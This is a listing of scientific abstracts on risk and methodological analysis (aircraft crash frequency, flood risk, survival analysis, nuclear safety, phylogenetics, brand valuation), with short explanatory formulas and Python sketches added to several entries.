    The Aircraft Crash Risk Analysis Methodology (ACRAM) Panel has been formed by the US Department of Energy Office of Defense Programs (DOE/DP) for the purpose of developing a standard methodology for determining the risk from aircraft crashes onto DOE ground facilities. In order to accomplish this goal, the ACRAM Panel has been divided into four teams: the data development team, the model evaluation team, the structural analysis team, and the consequence team. Each team, consisting of at least one member of the ACRAM Panel plus additional DOE and DOE contractor personnel, specializes in the development of the methodology assigned to that team. This report documents the work performed by the data development team and provides the technical basis for the data used by the ACRAM Standard for determining the aircraft crash frequency. This report should be used to provide the generic data needed to calculate the aircraft crash frequency into the facility under consideration as part of the process for determining the aircraft crash risk to ground facilities as given by the DOE Standard Aircraft Crash Risk Assessment Methodology (ACRAM). Some broad guidance is presented on how to obtain the needed site-specific and facility-specific data, but such data are not provided by this document
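    For context, aircraft crash frequency assessments of this general kind are commonly expressed with a four-factor formula. The form below is the widely used generic expression; it is shown for orientation only and is not quoted from the ACRAM documents.

    $$ F = \sum_{i} N_i \, P_i \, f_i(x, y) \, A_{\mathrm{eff},i} $$

    where, for each aircraft category i, N_i is the number of flight operations, P_i the crash probability per operation, f_i(x, y) the conditional crash-location probability per unit area at the facility site, and A_eff,i the effective target area of the facility.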

  17. A quantitative flood risk analysis methodology for urban areas with integration of social research data

    Directory of Open Access Journals (Sweden)

    I. Escuder-Bueno

    2012-09-01

    Full Text Available Risk analysis has become a top priority for authorities and stakeholders in many European countries, with the aim of reducing flooding risk, considering the population's needs and improving risk awareness. Within this context, two methodological pieces have been developed in the period 2009–2011 within the SUFRI project (Sustainable Strategies of Urban Flood Risk Management with non-structural measures to cope with the residual risk, 2nd ERA-Net CRUE Funding Initiative). First, the "SUFRI Methodology for pluvial and river flooding risk assessment in urban areas to inform decision-making" provides a comprehensive and quantitative tool for flood risk analysis. Second, the "Methodology for investigation of risk awareness of the population concerned" presents the basis to estimate current risk from a social perspective and identify tendencies in the way floods are understood by citizens. Outcomes of both methods are integrated in this paper with the aim of informing decision making on non-structural protection measures. The results of two case studies are shown to illustrate practical applications of this developed approach. The main advantage of applying the methodology herein presented consists in providing a quantitative estimation of flooding risk before and after investing in non-structural risk mitigation measures. It can be of great interest for decision makers as it provides rational and solid information.

  18. A quantitative flood risk analysis methodology for urban areas with integration of social research data

    Science.gov (United States)

    Escuder-Bueno, I.; Castillo-Rodríguez, J. T.; Zechner, S.; Jöbstl, C.; Perales-Momparler, S.; Petaccia, G.

    2012-09-01

    Risk analysis has become a top priority for authorities and stakeholders in many European countries, with the aim of reducing flooding risk, considering the population's needs and improving risk awareness. Within this context, two methodological pieces have been developed in the period 2009-2011 within the SUFRI project (Sustainable Strategies of Urban Flood Risk Management with non-structural measures to cope with the residual risk, 2nd ERA-Net CRUE Funding Initiative). First, the "SUFRI Methodology for pluvial and river flooding risk assessment in urban areas to inform decision-making" provides a comprehensive and quantitative tool for flood risk analysis. Second, the "Methodology for investigation of risk awareness of the population concerned" presents the basis to estimate current risk from a social perspective and identify tendencies in the way floods are understood by citizens. Outcomes of both methods are integrated in this paper with the aim of informing decision making on non-structural protection measures. The results of two case studies are shown to illustrate practical applications of this developed approach. The main advantage of applying the methodology herein presented consists in providing a quantitative estimation of flooding risk before and after investing in non-structural risk mitigation measures. It can be of great interest for decision makers as it provides rational and solid information.
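    The quantitative comparison described (risk before versus after non-structural measures) is often summarized as expected annual damage. Below is a minimal sketch of that calculation, assuming a set of flood scenarios by return period with estimated damages; the scenario structure and all numbers are invented for illustration and are not taken from the SUFRI case studies.

    ```python
    import numpy as np

    # Illustrative scenarios: return periods (years) and damages (e.g., EUR)
    # with and without non-structural measures (warning systems, awareness campaigns).
    return_periods = np.array([10.0, 50.0, 100.0, 500.0])
    damage_before = np.array([2e6, 9e6, 2.5e7, 8e7])
    damage_after = np.array([1e6, 5e6, 1.5e7, 5e7])

    def expected_annual_damage(return_periods, damages):
        """Integrate damage over annual exceedance probability (trapezoidal rule)."""
        aep = 1.0 / return_periods
        order = np.argsort(aep)  # integrate from low to high exceedance probability
        return np.trapz(damages[order], aep[order])

    reduction = (expected_annual_damage(return_periods, damage_before)
                 - expected_annual_damage(return_periods, damage_after))
    print(f"Expected annual damage reduction: {reduction:,.0f}")
    ```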

  19. A fatal elephant attack.

    Science.gov (United States)

    Hejna, Petr; Zátopková, Lenka; Safr, Miroslav

    2012-01-01

    A rare case of an elephant attack is presented. A 44-year-old man working as an elephant keeper was attacked by a cow elephant when he tripped over a foot chain while the animal was being medically treated. The man fell down and was consequently repeatedly attacked with elephant tusks. The man sustained multiple stab injuries to both groin regions, a penetrating injury to the abdominal wall with traumatic prolapse of the loops of the small bowel, multiple defects of the mesentery, and incomplete laceration of the abdominal aorta with massive bleeding into the abdominal cavity. In addition to the penetrating injuries, the man sustained multiple rib fractures with contusion of both lungs and laceration of the right lobe of the liver, and comminuted fractures of the pelvic arch and left femoral body. The man died shortly after he had been received at the hospital. The cause of death was attributed to traumatic shock. © 2011 American Academy of Forensic Sciences.

  20. Reporting and methodological quality of survival analysis in articles published in Chinese oncology journals.

    Science.gov (United States)

    Zhu, Xiaoyan; Zhou, Xiaobin; Zhang, Yuan; Sun, Xiao; Liu, Haihua; Zhang, Yingying

    2017-12-01

    Survival analysis methods have gained widespread use in the field of oncology. For the achievement of reliable results, the methodological process and reporting quality are crucial. This review provides the first examination of the methodological characteristics and reporting quality of survival analysis in articles published in leading Chinese oncology journals. Our aims were to examine the methodological and reporting quality of survival analysis, to identify common deficiencies, to suggest desirable precautions in the analysis, and to offer related advice for authors, readers, and editors. A total of 242 survival analysis articles, drawn from 1492 articles published in 4 leading Chinese oncology journals in 2013, were included for evaluation. Articles were evaluated according to 16 established items for the proper use and reporting of survival analysis. The application rates of Kaplan-Meier, life table, log-rank test, Breslow test, and Cox proportional hazards model (Cox model) were 91.74%, 3.72%, 78.51%, 0.41%, and 46.28%, respectively; no article used a parametric method for survival analysis. A multivariate Cox model was conducted in 112 articles (46.28%). Follow-up rates were mentioned in 155 articles (64.05%); of these, 4 articles reported rates under 80% (the lowest being 75.25%) and 55 articles reported 100%. The reporting rates of all types of survival endpoint were lower than 10%. Eleven of the 100 articles that reported a loss to follow-up stated how it was treated in the analysis. One hundred thirty articles (53.72%) did not perform multivariate analysis. One hundred thirty-nine articles (57.44%) did not define the survival time. Violations and omissions of methodological guidelines included no mention of pertinent checks of the proportional hazards assumption, no report of testing for interactions and collinearity between independent variables, and no report of the sample size calculation method. Thirty-six articles (32.74%) reported the methods of independent variable selection. The above defects could make the reported results potentially inaccurate.
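    The analysis steps whose reporting is audited above (Kaplan-Meier estimation, log-rank test, Cox model, and the proportional-hazards check) can be sketched with the Python lifelines package. The package choice, file name, and column names are assumptions for illustration; the reviewed articles used their own software and data.

    ```python
    import pandas as pd
    from lifelines import KaplanMeierFitter, CoxPHFitter
    from lifelines.statistics import logrank_test

    # Hypothetical cohort: one row per patient with survival time, event indicator
    # (1 = event, 0 = censored) and covariates.
    df = pd.read_csv("cohort.csv")

    kmf = KaplanMeierFitter()
    kmf.fit(durations=df["time"], event_observed=df["event"])  # Kaplan-Meier curve

    treated = df["treatment"] == 1
    lr = logrank_test(df.loc[treated, "time"], df.loc[~treated, "time"],
                      df.loc[treated, "event"], df.loc[~treated, "event"])

    model_df = df[["time", "event", "age", "stage", "treatment"]]
    cph = CoxPHFitter()
    cph.fit(model_df, duration_col="time", event_col="event")  # multivariate Cox model
    cph.check_assumptions(model_df)                            # proportional-hazards check
    print(lr.p_value)
    print(cph.summary)
    ```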

  1. Methodological Choices in Muscle Synergy Analysis Impact Differentiation of Physiological Characteristics Following Stroke

    Directory of Open Access Journals (Sweden)

    Caitlin L. Banks

    2017-08-01

    Full Text Available Muscle synergy analysis (MSA) is a mathematical technique that reduces the dimensionality of electromyographic (EMG) data. Used increasingly in biomechanics research, MSA requires methodological choices at each stage of the analysis. Differences in methodological steps affect the overall outcome, making it difficult to compare results across studies. We applied MSA to EMG data collected from individuals post-stroke identified as either responders (RES) or non-responders (nRES) on the basis of a critical post-treatment increase in walking speed. Importantly, no clinical or functional indicators identified differences between the cohorts of RES and nRES at baseline. For this exploratory study, we selected the five highest RES and five lowest nRES available from a larger sample. Our goal was to assess how the methodological choices made before, during, and after MSA affect the ability to differentiate two groups with intrinsic physiologic differences based on MSA results. We investigated 30 variations in MSA methodology to determine which choices allowed differentiation of RES from nRES at baseline. Trial-to-trial variability in time-independent synergy vectors (SVs) and time-varying neural commands (NCs) was measured as a function of: (1) the number of synergies computed; (2) the EMG normalization method before MSA; (3) whether SVs were held constant across trials or allowed to vary during MSA; and (4) the synergy analysis output normalization method after MSA. MSA methodology had a strong effect on our ability to differentiate RES from nRES at baseline. Across all 10 individuals and MSA variations, two synergies were needed to reach an average of 90% variance accounted for (VAF). Based on effect sizes, differences in SV and NC variability between groups were greatest using two synergies with SVs that varied from trial to trial. Differences in SV variability were clearest using unit magnitude per trial EMG normalization, while NC variability was less sensitive to EMG normalization.
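    MSA is most commonly implemented with non-negative matrix factorization; the abstract does not name the factorization algorithm, so that choice, the placeholder data, and the two-synergy setting below are assumptions. The sketch shows the core computation: factoring an EMG envelope matrix into synergy vectors and neural commands, then computing VAF.

    ```python
    import numpy as np
    from sklearn.decomposition import NMF

    # Placeholder non-negative EMG envelope matrix: time samples x muscles.
    rng = np.random.default_rng(0)
    emg = np.abs(rng.normal(size=(2000, 8)))

    model = NMF(n_components=2, init="nndsvd", max_iter=2000)
    neural_commands = model.fit_transform(emg)   # time-varying NCs (W)
    synergy_vectors = model.components_          # time-independent SVs (H)

    reconstruction = neural_commands @ synergy_vectors
    vaf = 1.0 - np.sum((emg - reconstruction) ** 2) / np.sum(emg ** 2)
    print(f"Variance accounted for by 2 synergies: {vaf:.1%}")
    ```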

  2. Business analysis methodology in telecommunication industry – the research based on the grounded theory

    Directory of Open Access Journals (Sweden)

    Hana Nenickova

    2013-10-01

    Full Text Available The objective of this article is to present the use of grounded theory in qualitative research as a basis for building a business analysis methodology for the implementation of information systems in telecommunication enterprises in the Czech Republic. In preparing the methodology I have drawn on the current needs of telecommunications companies, which are characterized mainly by a high dependence on information systems. Besides that, this industry is characterized by high flexibility, strong competition, and a compressed corporate strategy timeline. The grounded theory of business analysis captures the specifics of the telecommunications industry, focusing on a very specific description of the procedure for collecting business requirements and following the business strategy.

  3. Application of GO methodology in reliability analysis of offsite power supply of Daya Bay NPP

    International Nuclear Information System (INIS)

    Shen Zupei; Li Xiaodong; Huang Xiangrui

    2003-01-01

    The author applies the GO methodology to the reliability analysis of the offsite power supply system of Daya Bay NPP. Direct quantitative calculation formulas for the steady-state reliability index of a system with shared signals, and dynamic calculation formulas for the state probability of a two-state unit, are derived. The method for solving the fault event sets of the system is also presented, and all the fault event sets of the offsite power supply system and their failure probabilities are obtained. The recovery reliability of the offsite power supply system after a stability failure of the power grid is also calculated. The result shows that the GO methodology is simple and useful in the steady-state and dynamic reliability analysis of repairable systems
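    The "dynamic calculation formulas of the state probability for the unit with two states" mentioned above are consistent with the standard two-state repairable-unit availability result, shown here for context; this is the textbook expression, not necessarily the paper's exact notation.

    $$ P_{\mathrm{up}}(t) = \frac{\mu}{\lambda + \mu} + \frac{\lambda}{\lambda + \mu}\, e^{-(\lambda + \mu) t} $$

    where λ is the failure rate, μ the repair rate, and the unit is assumed to start in the operating state; as t → ∞ this reduces to the steady-state availability μ/(λ + μ).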

  4. Methodology of a PWR containment analysis during a thermal-hydraulic accident

    Energy Technology Data Exchange (ETDEWEB)

    Silva, Dayane F.; Sabundjian, Gaiane; Lima, Ana Cecilia S., E-mail: dayane.silva@usp.br, E-mail: gdjian@ipen.br, E-mail: aclima@ipen.br [Instituto de Pesquisas Energeticas e Nucleares (IPEN/CNEN-SP), Sao Paulo, SP (Brazil)

    2015-07-01

    The aim of this work is to present the calculation methodology for the Angra 2 reactor containment during accidents of the Loss of Coolant Accident (LOCA) type. This study will make it possible to ensure the safety of the surrounding population in the event of an accident. One of the programs used to analyze the containment of a nuclear plant is CONTAIN. This computer code is an analysis tool used for predicting the physical conditions and distributions of radionuclides inside a containment building following the release of material from the primary system in a light-water reactor during an accident. The containment of a PWR plant is a concrete building internally lined with metallic material and has design pressure limits. The containment analysis methodology must estimate the pressure limits during a LOCA. The boundary conditions for the simulation are obtained from the RELAP5 code. (author)

  5. Methodology of a PWR containment analysis during a thermal-hydraulic accident

    International Nuclear Information System (INIS)

    Silva, Dayane F.; Sabundjian, Gaiane; Lima, Ana Cecilia S.

    2015-01-01

    The aim of this work is to present the calculation methodology for the Angra 2 reactor containment during accidents of the Loss of Coolant Accident (LOCA) type. This study will make it possible to ensure the safety of the surrounding population in the event of an accident. One of the programs used to analyze the containment of a nuclear plant is CONTAIN. This computer code is an analysis tool used for predicting the physical conditions and distributions of radionuclides inside a containment building following the release of material from the primary system in a light-water reactor during an accident. The containment of a PWR plant is a concrete building internally lined with metallic material and has design pressure limits. The containment analysis methodology must estimate the pressure limits during a LOCA. The boundary conditions for the simulation are obtained from the RELAP5 code. (author)

  6. Effects of methodology and analysis strategy on robustness of pestivirus phylogeny.

    Science.gov (United States)

    Liu, Lihong; Xia, Hongyan; Baule, Claudia; Belák, Sándor; Wahlberg, Niklas

    2010-01-01

    Phylogenetic analysis of pestiviruses is a useful tool for classifying novel pestiviruses and for revealing their phylogenetic relationships. In this study, robustness of pestivirus phylogenies has been compared by analyses of the 5'UTR, and complete N(pro) and E2 gene regions separately and combined, performed by four methods: neighbour-joining (NJ), maximum parsimony (MP), maximum likelihood (ML), and Bayesian inference (BI). The strategy of analysing the combined sequence dataset by BI, ML, and MP methods resulted in a single, well-supported tree topology, indicating a reliable and robust pestivirus phylogeny. By contrast, the single-gene analysis strategy resulted in 12 trees of different topologies, revealing different relationships among pestiviruses. These results indicate that the strategies and methodologies are two vital aspects affecting the robustness of the pestivirus phylogeny. The strategy and methodologies outlined in this paper may have a broader application in inferring phylogeny of other RNA viruses.
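    Of the four methods compared, the distance-based neighbour-joining step is easy to sketch with Biopython; ML and Bayesian analyses would normally be run in dedicated tools (e.g., RAxML, MrBayes). The alignment file name and distance model below are assumptions, not the study's actual inputs.

    ```python
    from Bio import AlignIO, Phylo
    from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor

    # Hypothetical concatenated alignment of 5'UTR + Npro + E2 sequences.
    alignment = AlignIO.read("pestivirus_concat.fasta", "fasta")

    calculator = DistanceCalculator("identity")      # simple p-distance model (illustrative)
    distance_matrix = calculator.get_distance(alignment)

    constructor = DistanceTreeConstructor()
    nj_tree = constructor.nj(distance_matrix)        # neighbour-joining topology
    Phylo.draw_ascii(nj_tree)
    ```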

  7. Unified communications forensics anatomy of common UC attacks

    CERN Document Server

    Grant, Nicholas Mr

    2013-01-01

    Unified Communications Forensics: Anatomy of Common UC Attacks is the first book to explain the issues and vulnerabilities and to demonstrate the attacks, forensic artifacts, and countermeasures required to establish a secure unified communications (UC) environment. This book is written by leading UC experts Nicholas Grant and Joseph W. Shaw II and provides material never before found on the market, including: analysis of forensic artifacts in common UC attacks; an in-depth look at established UC technologies and attack exploits; and a hands-on understanding of UC attack vectors and associated countermeasures.

  8. Quantitative Verification and Synthesis of Attack-Defence Scenarios

    DEFF Research Database (Denmark)

    Aslanyan, Zaruhi; Nielson, Flemming; Parker, David

    2016-01-01

    analysis of quantitative properties of complex attack-defence scenarios, using an extension of attack-defence trees which models temporal ordering of actions and allows explicit dependencies in the strategies adopted by attackers and defenders. We adopt a game-theoretic approach, translating attack...... which guarantee or optimise some quantitative property, such as the probability of a successful attack, the expected cost incurred, or some multi-objective trade-off between the two. We implement our approach, building upon the PRISM-games model checker, and apply it to a case study of an RFID goods...
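    The quantitative idea behind attack-defence analysis can be illustrated outside PRISM-games with a toy attack-defence tree in which deployed defences reduce the success probability of the attack steps they counter. The tree structure, defences, and probabilities below are invented for illustration and do not come from the case study.

    ```python
    # Toy attack-defence tree: the attacker succeeds by phishing OR by
    # (exploiting a service AND escalating privileges); each defence, if
    # deployed, scales down the probability of the step it counters.
    def or_gate(*probs):   # at least one independent child attack succeeds
        fail_all = 1.0
        for p in probs:
            fail_all *= (1.0 - p)
        return 1.0 - fail_all

    def and_gate(*probs):  # all child attacks must succeed
        result = 1.0
        for p in probs:
            result *= p
        return result

    defences = {"awareness_training": True, "patching": False}
    p_phish = 0.30 * (0.5 if defences["awareness_training"] else 1.0)
    p_exploit = 0.40 * (0.2 if defences["patching"] else 1.0)
    p_escalate = 0.25

    p_success = or_gate(p_phish, and_gate(p_exploit, p_escalate))
    print(f"Probability of successful attack: {p_success:.3f}")
    ```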

  9. Analysis of Interbrand, BrandZ and BAV brand valuation methodologies

    Directory of Open Access Journals (Sweden)

    Krstić Bojan

    2011-01-01

    Full Text Available Brand valuation is considered one of the most significant challenges not only for the theory and practice of contemporary marketing, but for other disciplines as well. Namely, the complex nature of this issue implies the need for a multidisciplinary approach and the creation of a methodology which goes beyond the borders of marketing as a discipline and includes knowledge derived from accounting, finance and other areas. However, mostly one-sided approaches, oriented towards determining brand value either on the basis of research into consumer behavior and attitudes or on the basis of the financial success of the brand, are dominant in the marketing and financial literature. Simultaneously with these theoretical methodologies, consultancy and marketing agencies and other subjects have been developing their own brand valuation methods and models. Some of them can be assigned to the comprehensive approach to brand valuation, which overcomes the mentioned problem of one-sided analysis of brand value. The comprehensive approach presumes brand valuation based on the benefits which the brand provides to both the customers and the enterprise that owns it; in other words, it is based on qualitative and quantitative measures respectively reflecting the behavior and attitudes of consumers and the assumed financial value of the brand, or, more precisely, brand value capitalization. According to the defined research subject, this paper is structured as follows: the importance and the problem of brand value are reviewed in the Introduction, and the three most well-known brand valuation methodologies developed by consultancy agencies (the Interbrand methodology and the BrandZ and BAV models) are analyzed in the next section. In the further considerations the results of a comparative analysis of these methodologies are presented and implications for adequate brand valuation are suggested.

  10. Methodology of demand forecast by market analysis of electric power and load curves

    International Nuclear Information System (INIS)

    Barreiro, C.J.; Atmann, J.L.

    1989-01-01

    A methodology for demand forecasting by consumer class and its aggregation is presented. An analysis of the market actually served can be carried out through appropriate measurements and load curve studies. The assumptions for future market behaviour by consumer class (industrial, residential, commercial, others) are shown, and the actions to optimize this market, obtained through load curve modulation, are foreseen. Future demand is then determined by the appropriate aggregation of these segmented demands. (C.G.C.)
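    The aggregation step can be sketched as summing hourly load curves per consumer class after applying class-specific growth and load-modulation assumptions. All curves and factors below are hypothetical, purely to show the arithmetic of the aggregation.

    ```python
    import numpy as np

    hours = np.arange(24)
    # Hypothetical hourly load curves per consumer class, in MW.
    load_curves = {
        "residential": 80 + 40 * np.sin((hours - 18) / 24 * 2 * np.pi),
        "industrial": 120 + 10 * np.cos(hours / 24 * 2 * np.pi),
        "commercial": 60 + 30 * np.exp(-((hours - 14) ** 2) / 18.0),
    }
    growth = {"residential": 1.04, "industrial": 1.02, "commercial": 1.05}      # annual growth factors
    modulation = {"residential": 0.97, "industrial": 1.00, "commercial": 0.95}  # load-management effect

    forecast = sum(curve * growth[c] * modulation[c] for c, curve in load_curves.items())
    print(f"Forecast peak demand: {forecast.max():.1f} MW at hour {forecast.argmax()}")
    ```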

  11. Comparing Internet Probing Methodologies Through an Analysis of Large Dynamic Graphs

    Science.gov (United States)

    2014-06-01

    ... including DIMES, IPlane, Ark IPv4 All Prefix /24 and, recently, the NPS probing methodology. The NPS probing methodology is different from the others because it ... trace, a history of the forward interface-level path and the time to send and acknowledge are available to analyze. However, traceroute may not return

  12. Methodological Approach to Company Cash Flows Target-Oriented Forecasting Based on Financial Position Analysis

    OpenAIRE

    Sergey Krylov

    2012-01-01

    The article treats a new methodological approach to target-oriented forecasting of company cash flows based on analysis of its financial position. The approach is intended to be universal and presumes the application of the following techniques developed by the author: the financial ratio values correction technique and the correcting cash flows technique. The financial ratio values correction technique is used to analyze and forecast the company's financial position, while the correcting cash flows technique i...

  13. Methodological and theoretical issues in the comparative analysis of gender relations in Western Europe

    OpenAIRE

    S Walby

    1994-01-01

    The aim in this paper is to contribute to the development of a research agenda for the comparative analysis of gender relations in Western Europe. Its focus is the clarification of the methodological and theoretical issues involved. Several different indices of gender inequality are assessed. It is argued that it is important to distinguish between the form and degree of patriarchy, rather than assuming that these are closely associated. Data from the EC and Scandinavia are used to illustrate...

  14. An analysis methodology for hot leg break mass and energy release

    International Nuclear Information System (INIS)

    Song, Jin Ho; Kwon, Young Min; Kim, Taek Mo; Chung, Hae Yong; Lee, Sang Jong

    1996-07-01

    An analysis methodology for the hot leg break mass and energy release is developed. For the blowdown period a modified CEFLASH-4A analysis is suggested. For the post-blowdown period a new computer model named COMET is developed. Unlike the previous post-blowdown analysis model FLOOD3, COMET is capable of analyzing both cold leg and hot leg break cases. The cold leg break model is essentially the same as that of FLOOD3 with some improvements. The analysis results from the newly proposed hot leg break model in COMET follow the same trend as those observed in a scaled-down integral experiment. The analysis results for UCN 3 and 4 obtained with COMET are qualitatively and quantitatively in good agreement with those predicted by best-estimate analysis using RELAP5/MOD3. Therefore, the COMET code is validated and can be used for the licensing analysis. 6 tabs., 82 figs., 9 refs. (Author)

  15. Significant aspects of the external event analysis methodology of the Jose Cabrera NPP PSA

    International Nuclear Information System (INIS)

    Barquin Duena, A.; Martin Martinez, A.R.; Boneham, P.S.; Ortega Prieto, P.

    1994-01-01

    This paper describes the following advances in the methodology for the Analysis of External Events in the PSA of the Jose Cabrera NPP: In the Fire Analysis, a version of the COMPBRN3 code, modified by Empresarios Agrupados according to the guidelines of Appendix D of NUREG/CR-5088, has been used. Generic cases were modelled and general conclusions obtained, applicable to fire propagation in closed areas. The damage times obtained were appreciably lower than those obtained with the previous version of the code. The Flood Analysis methodology is based on the construction of event trees to represent flood propagation dependent on the condition of the communication paths between areas, and trees showing propagation stages as a function of affected areas and damaged mitigation equipment. To determine the temporal evolution of the flood level in an area, the CAINZO-EA code has been developed, adapted to specific plant characteristics. In both the Fire and Flood Analyses a quantification methodology has been adopted, which consists of analysing the damage caused at each stage of growth or propagation and identifying, in the Internal Events models, the gates, basic events or headers to which guaranteed failure (probability 1) due to damage is assigned. (Author)

  16. Safety analysis methodology with assessment of the impact of the prediction errors of relevant parameters

    International Nuclear Information System (INIS)

    Galia, A.V.

    2011-01-01

    The best estimate plus uncertainty approach (BEAU) requires the use of extensive resources and is therefore usually applied to cases in which the available safety margin obtained with a conservative methodology can be questioned. Outside the BEAU methodology, there is no clear approach for dealing with the uncertainties resulting from prediction errors in the safety analyses performed for licensing submissions. However, the regulatory document RD-310 mentions that the analysis method shall account for uncertainties in the analysis data and models. A possible approach is presented, simple and reasonable and representing only the author's views, to take into account the impact of prediction errors and other uncertainties when performing safety analysis in line with regulatory requirements. The approach proposes taking into account the prediction error of relevant parameters. Relevant parameters would be those plant parameters that are surveyed and used to initiate the action of a mitigating system, or those that are representative of the most challenging phenomena for the integrity of a fission barrier. Examples of the application of the methodology are presented, involving a comparison between the results of the new approach and a best estimate calculation during the blowdown phase for two small breaks in a generic CANDU 6 station. The calculations are performed with the CATHENA computer code. (author)

  17. Methodology for the analysis of pollutant emissions from a city bus

    International Nuclear Information System (INIS)

    Armas, Octavio; Lapuerta, Magín; Mata, Carmen

    2012-01-01

    In this work a methodology is proposed for measurement and analysis of gaseous emissions and particle size distributions emitted by a diesel city bus during its typical operation under urban driving conditions. As test circuit, a passenger transportation line at a Spanish city was used. Different ways for data processing and representation were studied and, derived from this work, a new approach is proposed. The methodology was useful to detect the most important uncertainties arising during registration and processing of data derived from a measurement campaign devoted to determine the main pollutant emissions. A HORIBA OBS-1300 gas analyzer and a TSI engine exhaust particle spectrometer were used with 1 Hz frequency data recording. The methodology proposed allows for the comparison of results (in mean values) derived from the analysis of either complete cycles or specific categories (or sequences). The analysis by categories is demonstrated to be a robust and helpful tool to isolate the effect of the main vehicle parameters (relative fuel–air ratio and velocity) on pollutant emissions. It was shown that acceleration sequences have the highest contribution to the total emissions, whereas deceleration sequences have the least. (paper)

  18. A methodology for collection and analysis of human error data based on a cognitive model: IDA

    International Nuclear Information System (INIS)

    Shen, S.-H.; Smidts, C.; Mosleh, A.

    1997-01-01

    This paper presents a model-based human error taxonomy and data collection. The underlying model, IDA (described in two companion papers), is a cognitive model of behavior developed for analysis of the actions of nuclear power plant operating crew during abnormal situations. The taxonomy is established with reference to three external reference points (i.e. plant status, procedures, and crew) and four reference points internal to the model (i.e. information collected, diagnosis, decision, action). The taxonomy helps the analyst: (1) recognize errors as such; (2) categorize the error in terms of generic characteristics such as 'error in selection of problem solving strategies' and (3) identify the root causes of the error. The data collection methodology is summarized in post event operator interview and analysis summary forms. The root cause analysis methodology is illustrated using a subset of an actual event. Statistics, which extract generic characteristics of error prone behaviors and error prone situations are presented. Finally, applications of the human error data collection are reviewed. A primary benefit of this methodology is to define better symptom-based and other auxiliary procedures with associated training to minimize or preclude certain human errors. It also helps in design of control rooms, and in assessment of human error probabilities in the probabilistic risk assessment framework. (orig.)

  19. Methodology for the analysis of pollutant emissions from a city bus

    Science.gov (United States)

    Armas, Octavio; Lapuerta, Magín; Mata, Carmen

    2012-04-01

    In this work a methodology is proposed for measurement and analysis of gaseous emissions and particle size distributions emitted by a diesel city bus during its typical operation under urban driving conditions. As test circuit, a passenger transportation line at a Spanish city was used. Different ways for data processing and representation were studied and, derived from this work, a new approach is proposed. The methodology was useful to detect the most important uncertainties arising during registration and processing of data derived from a measurement campaign devoted to determine the main pollutant emissions. A HORIBA OBS-1300 gas analyzer and a TSI engine exhaust particle spectrometer were used with 1 Hz frequency data recording. The methodology proposed allows for the comparison of results (in mean values) derived from the analysis of either complete cycles or specific categories (or sequences). The analysis by categories is demonstrated to be a robust and helpful tool to isolate the effect of the main vehicle parameters (relative fuel-air ratio and velocity) on pollutant emissions. It was shown that acceleration sequences have the highest contribution to the total emissions, whereas deceleration sequences have the least.
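    The "analysis by categories" described in the two records above can be sketched by segmenting the 1 Hz record into acceleration, deceleration, cruise, and idle sequences and averaging emissions per category. The file name, column names, and thresholds below are assumptions, not the study's actual settings.

    ```python
    import numpy as np
    import pandas as pd

    # Hypothetical 1 Hz records: vehicle speed (km/h) and an instantaneous NOx rate (g/s).
    df = pd.read_csv("bus_route_1hz.csv")
    accel = np.gradient(df["speed_kmh"] / 3.6)   # m/s^2 at 1 Hz sampling

    def categorize(speed_ms, a, a_thr=0.1, v_idle=1.0):
        if speed_ms < v_idle:
            return "idle"
        if a > a_thr:
            return "acceleration"
        if a < -a_thr:
            return "deceleration"
        return "cruise"

    df["category"] = [categorize(v / 3.6, a) for v, a in zip(df["speed_kmh"], accel)]
    summary = df.groupby("category")["nox_g_s"].agg(["mean", "sum"])
    print(summary)   # mean emission rate and total contribution per driving category
    ```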

  20. Development of the fire PSA methodology and the fire analysis computer code system

    International Nuclear Information System (INIS)

    Katsunori, Ogura; Tomomichi, Ito; Tsuyoshi, Uchida; Yusuke, Kasagawa

    2009-01-01

    A fire PSA methodology has been developed and applied to NPPs in Japan for power operation and LPSD states. The CDFs of the preliminary fire PSA for power operation were higher than those of internal events. A fire propagation analysis code system (CFAST/FDS Network) was being developed and verified through the OECD PRISME Project. Extension of the scope to the LPSD state is planned in order to establish the risk level. In order to establish the fire risk level precisely, enhancement of the methodology is planned: verification and validation of the phenomenological fire propagation analysis code (CFAST/FDS Network) in the context of fire PSA, and enhancement of the methodology, such as application of the 'Electric Circuit Analysis' of NUREG/CR-6850 and related tests, in order to quantify the hot-short effect precisely. Development of a seismic-induced fire PSA method, integrating the existing seismic PSA and fire PSA methods, is ongoing. Fire PSA will be applied to review the validity of fire prevention and mitigation measures.

  1. How to conduct a qualitative meta-analysis: Tailoring methods to enhance methodological integrity.

    Science.gov (United States)

    Levitt, Heidi M

    2018-05-01

    Although qualitative research has long been of interest in the field of psychology, meta-analyses of qualitative literatures (sometimes called meta-syntheses) are still quite rare. Like quantitative meta-analyses, these methods function to aggregate findings and identify patterns across primary studies, but their aims, procedures, and methodological considerations may vary. This paper explains the function of qualitative meta-analyses and their methodological development. Recommendations have broad relevance but are framed with an eye toward their use in psychotherapy research. Rather than arguing for the adoption of any single meta-method, this paper advocates for considering how procedures can best be selected and adapted to enhance a meta-study's methodological integrity. Through the paper, recommendations are provided to help researchers identify procedures that can best serve their studies' specific goals. Meta-analysts are encouraged to consider the methodological integrity of their studies in relation to central research processes, including identifying a set of primary research studies, transforming primary findings into initial units of data for a meta-analysis, developing categories or themes, and communicating findings. The paper provides guidance for researchers who desire to tailor meta-analytic methods to meet their particular goals while enhancing the rigor of their research.

  2. Analysis of Feedback processes in Online Group Interaction: a methodological model

    Directory of Open Access Journals (Sweden)

    Anna Espasa

    2013-06-01

    Full Text Available The aim of this article is to present a methodological model to analyze students' group interaction to improve their essays in online learning environments based on asynchronous and written communication. In these environments, teacher and student scaffolds for discussion are essential to promote interaction. One of these scaffolds can be feedback. Research on feedback processes has predominantly focused on feedback design rather than on how students utilize feedback to improve learning. This methodological model fills this gap, contributing to the analysis of how feedback processes are implemented while students discuss collaboratively in a specific case of writing assignments. A review of different methodological models was carried out to define a framework adjusted to the analysis of the relationship between written and asynchronous group interaction, students' activity, and the changes incorporated into the final text. The proposed model includes the following dimensions: (1) student participation, (2) nature of student learning, and (3) quality of student learning. The main contribution of this article is to present the methodological model and also to ascertain its applicability regarding how students incorporate such feedback into their essays.

  3. A methodology for spacecraft technology insertion analysis balancing benefit, cost, and risk

    Science.gov (United States)

    Bearden, David Allen

